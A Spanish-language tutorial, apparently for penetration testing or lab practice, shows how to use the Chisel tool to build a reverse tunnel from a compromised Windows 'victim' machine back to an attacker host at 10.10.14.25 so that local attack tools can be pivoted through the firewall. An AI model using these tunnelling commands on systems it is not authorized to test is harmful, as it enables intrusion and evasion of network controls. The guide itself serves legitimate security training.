Chisel es una herramienta que se utiliza para crear un túnel TCP/UDP rápido, transportado a través del servicio HTTP y protegido a través de SSH. Está escrito en Go y usa el protocolo de cliente a servidor. Chisel es principalmente útil para pasar a través de firewalls, aunque también se puede emplear para proporcionar un punto final seguro en su red.
La herramienta la podéis descargar desde el siguiente repositorio de Github, en el podréis encontrar tanto la versión para Linux, como las versiones de 32 y 64 bits para Windows:
https://github.com/jpillora/chisel/releases/tag/v1.7.7
Es importante tener claro de que en caso de querer establecer una conexión entre un sistema Linux y un Windows, tendremos que descargarnos las dos versiones correspondientes para cada sistema.
Una vez hemos ganado acceso o tenemos la posibilidad de subir archivos y ejecutar comandos en el dispositivo víctima, podemos crear un túnel con Chisel. Mediante esta herramienta podremos establecer una conexión de cliente a servidor y conectar dos puertos entre sí. Básicamente, conectamos un puerto de la máquina víctima con uno de nuestro equipo, de tal forma, que podemos ejecutar cualquier herramienta en local usando ese puerto, y automáticamente se redireccionara el ataque a la máquina víctima.
chisel server --reverse --port [Puerto Local Conexión]
./chisel server --reverse -p [Puerto Local Conexión]
chisel server --reverse -p 8081
Aquí podemos ver como en el ejemplo hemos establecido un servicio de servidor con Chisel por el puerto 8081, este puerto es el que posteriormente tendremos que especificar en el servicio por parte del Cliente para realizar la conexión.
Para establecer Chisel en un sistema Windows como Cliente, nos descargamos la versión específica para Windows (debemos de comprobar si el sistema es de 32 o 64 bits) y ejecutamos el siguiente comando. En él debemos especificar el puerto por el que vamos a comunicarnos con nuestro servicio Servidor y los puestos que vamos a comunicar entre sí:
.\chisel.exe client [Ip Local]:[Puerto de Conexión] R:[Puerto Víctima]:127.0.0.1:[Puerto Local]
.\chisel.exe client 10.10.14.25:8081 R:8888:127.0.0.1:8888
Como podéis comprobar, la conexión se realiza a través del puerto 8081, conectando de forma local nuestro puerto 8888 con el suyo.